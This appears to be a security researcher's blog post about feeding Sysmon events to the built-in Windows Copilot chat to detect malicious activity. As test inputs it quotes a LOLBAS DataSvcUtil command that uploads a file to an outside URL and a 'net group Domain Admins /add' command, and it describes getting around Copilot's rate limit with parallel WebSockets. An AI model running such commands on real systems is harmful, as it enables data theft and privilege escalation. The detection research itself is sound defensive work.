14 April 2025
Claudio Contin
Introduction
Andrej Karpathy (OpenAI co-founder) came up with the term Vibe coding
, which is the concept of writing software using AI by purely using prompts, without the need of coding skills.
Given the vibes of our current times, few days ago I was thinking: what's the "vibest" thing I could try to build in a few hours?
Then I remembered that Windows ships with the Copilot Chat application, which allows users to interact with the Copilot LLM without needing a paid Copilot API plan.
So I thought, would it be possible to use this LLM to deliver Windows host events to the LLM and let it determine if the events are a result of malicious actions performed?
I decided to investigate how the Windows Copilot application works... Buckle up and get ready to vibe!
Copilot Chat
The built-in Windows Copilot application is nothing more than a Progressive Web Application (PWA) that can be installed on a device and accessed as a standalone application. The application loads and renders the Copilot web application.
When a new chat is started, the application makes an HTTP POST request to the /c/api/start?dpwa=1
endpoint.
Once the conversation ID is returned, the application then switches protocol to use WebSocket, and the chat communication is performed over this channel.
Sysmon
I decided to enable Sysmon on my test host. For the Sysmon configuration I used https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml.
Sysmon events are visible from the Event Viewer, and can be programmatically queried using the Microsoft-Windows-Sysmon/Operational
log channel. Note that local administrator privileges are required in order to view and query Sysmon events (high integrity level).
I decided to query these Sysmon generated events (the raw XML which contains the full event details), send them to Copilot for analysis, and let Copilot decide if any of them contain any potentially malicious actions.
EDV tool
I wrote the EDV tool that queries Sysmon events, and delivers them to Copilot for analysis, using the WebSocket channel, in the same way as the Copilot Chat application. If you are wondering if AI was used to help coding it: ooohhh yessss, this is all about vibes!
The tool can be run in two different modes:
- Sync
- Async
I originally only implemented the sync
method, which obtains a new conversation ID from the Copilot endpoint mentioned earlier, and establishes a WebSocket connection that is used to send events and receive responses synchronously and in chronological order (earlier events first). If multiple prompts are sent concurrently over the same WebSocket channel, the Copilot endpoint returns an error, related to rate limiting (too many requests).
While writing, or better vibing, the tool, I then attempted to establish a new WebSocket connection for each of the event, and send a few of them in parallel, using the same conversation ID for all. In this scenario, the Copilot endpoint did not prevent concurrent requests. For this reason, the tool can also be launched with the async
mode. Note that in this mode, the events are not sent in a synchronous and chronological order, which might reduce the detection capability, but increases the speed of delivery, especially in cases where several events are generated within a short time-frame.
The tool also accepts a conversation ID and a list of comma separated event IDs as optional arguments. The conversation ID allows to re-use an existing Copilot conversation, rather that starting a new one. The event IDs argument allows to only inspect specific events. Sysmon events range from 1 to 31.
The prompt used to query Copilot is:
This is a Sysmon event of my Windows host. Does the event indicate anything malicious happening on my host?
You can use the previous events I already sent if it helps contextualizing this new event.
If yes, please respond with just "ALERT". If not, or you are not certain,
respond with just "OK" (also in the case you do not really understand the event).
Disregard domain names (do not want false positives).
Sysmon event raw XML is: [Raw XML Sysmon event]
The reason I asked to disregard DNS lookups is due to the fact that Copilot flagged several online advertisement domains as potentially malicious. For example, while browsing news websites, Copilot started responding with "ALERT" for events related to DNS lookups of these advertisement domains. I tried to edit to prompt to instruct to raise alerts for these domains only if absolutely certain, but it did not improve the results.
Finally, the tool disregards all events generated by the EDV itself, by using this simple regex against the Sysmon raw XML event:
string pattern = @"<Data Name=['""]Image['""]>.*\\EDV\.exe</Data>";
Results
For testing, I ran several Living Off The Land Binaries, Scripts and Libraries (LOLBAS), along with common PowerShell commands to run Base64-encoded input and execute external scripts downloaded from remote HTTP endpoints.
The tests were performed with Windows Defender enabled. Some of the commands were detected by Defender, which resulted in no event being saved in the Sysmon logs.
Events of the same kind, especially related to process creation, were not always flagged as malicious, which indicates that Copilot might inspect previous events before deciding to flag or not a certain event. For example, this command (from LOLBAS) DataSvcUtil /out:C:\Windows\Temp\data.log /uri:https://www.program-api.org/v1/upload
was not consistently flagged as malicious.
For events not blocked by Defender, Copilot was able to mark around 40% of the LOLBAS tested as malicious. Common actions, such as adding a domain user to the Domain Admins group (net group "Domain Admins" legit /add /domain
) were flagged as well. Below is an example of the Defender Real-time protection disable action which Copilot flagged.
Conclusion
Even though several false positives and negatives were observed during the testing, the results indicate that for some specific events, Copilot was better as flagging potential malicious actions that were not caught by Windows Defender.
Note: The tool is not intended for actual use — just vibes!